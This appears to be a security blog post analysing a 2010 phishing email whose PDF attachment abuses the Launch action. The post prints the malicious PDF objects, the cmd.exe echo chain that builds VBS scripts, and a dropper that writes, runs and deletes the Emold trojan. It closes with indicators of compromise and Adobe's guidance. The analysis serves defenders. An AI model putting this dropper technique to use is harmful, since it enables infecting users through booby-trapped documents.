Last night and this morning, a number of people received an email that looks like this:
From: [email protected]
[mailto:[email protected]]
Sent: Tuesday, April 27, 2010 7:47 AM
To: [email protected]
Subject: setting for your mailbox are changed
SMTP and POP3 servers for [email protected] mailbox are changed. Please carefully read the attached instructions before updating settings.
The message contains a file called "doc.pdf". That file was, of course, malicious in nature. It used the PDF Launch vulnerability to echo commands into a batch file and then run the Emold downloader trojan. Let's take a look at the code.
8 0 obj
<<
/Type /Action
/S /Launch
/Win
<<
/F (cmd.exe)
/P (/c echo Set fso=CreateObject("Scripting.FileSystemObject") > script.vbs && echo Set f=fso.OpenTextFile(?doc.pdf?, 1, True) >> script.vbs && echo pf=f.ReadAll >> script.vbs && echo s=InStr(pf,??SS?) >> script.vbs && echo e=InStr(pf,??EE?) >> script.vbs && echo s=Mid(pf,s,e-s) >> script.vbs && echo Set z=fso.OpenTextFile(?batscript.vbs?, 2, True) >> script.vbs && echo s = Replace(s,?%?,?") >> script.vbs && echo z.Write(s) >> script.vbs && script.vbs && batscript.vbs
This code sample uses cmd.exe to write text to a file called script.vbs. The code then executes script.vbs and batscript.vbs. Let's look at how script.vbs ends up:
Set fso=CreateObject(?Scripting.FileSystemObject?)
Set f=fso.OpenTextFile(?doc.pdf?, 1, True)
echo pf=f.ReadAll
echo s=InStr(pf,??SS?)
echo e=InStr(pf,??EE?)
s=Mid(pf,s,e-s)
Set z=fso.OpenTextFile(?batscript.vbs?, 2, True)
s = Replace(s,?%?,?")
z.Write(s)
When the code executes script.vbs, the VBS file opens doc.pdf and looks for the tags SS and EE to mark the beginning and end of a section of the pdf. It extracts that section, manipulates the text, and then writes the result to batscript.vbs.
Next, let's look what's in the tagged section of doc.pdf that ends up in batscript.vbs:
5 0 obj
<< /Length 46 >>
stream
BT
/F1 34 Tf
50 500 Td
(Important Information
doc.pdf)Tj
%?SS
%Dim b
%Function c(d)
%c=chr(d)
%End Function
%b=Array(c(077),c(090),c(144),c(000),c(003),c(000),c(000),c(000),c(004),c(000),c(000)?
?this line is 248413 characters long?
?c(000),c(000),c(000),c(000 ),?")
%Set fso = CreateObject(?Scripting.FileSystemObject?)
%Set f = fso.OpenTextFile(?game.exe?, 2, True)
%For i = 0 To 35328
%f.write(b(i))
%Next
%f.close()
%Set WshShell = WScript.CreateObject(?WScript.Shell?)
%WshShell.Run ?cmd.exe /c game.exe?
%WScript.Sleep 3000
%Set f = FSO.GetFile(?game.exe?)
%f.Delete
%Set f = FSO.GetFile(?batscript.vbs?)
%f.Delete
%Set f = FSO.GetFile(?script.vbs?)
%f.Delete
%?EE
endstream
The array stored in b is actually an obfuscated executable file that is stored in game.exe. After running game.exe, this script (executed in batscript.vbs) cleans up after itself by removing game.exe, batscript.vbs, and script.vbs.
Game.exe is the Emold trojan. Emold is a generic downloader that can be used to install any number of second stage trojans. It can be identified by the presence of the C:/Program Files/Microsoft Common/svchost.exe file, the software Microsoft Windows NTCurrent Version Image File Execution Optionsexplorer.exe registry key, and because it (currently) phones home to jademason.com.
Adobe has stated that the Launch functionality is a feature, not a bug. Adobe is looking into the issue, but has not said what action, if any, it intends to take to mitigate the danger. Their post on this issue does include directions for turning off this functionality.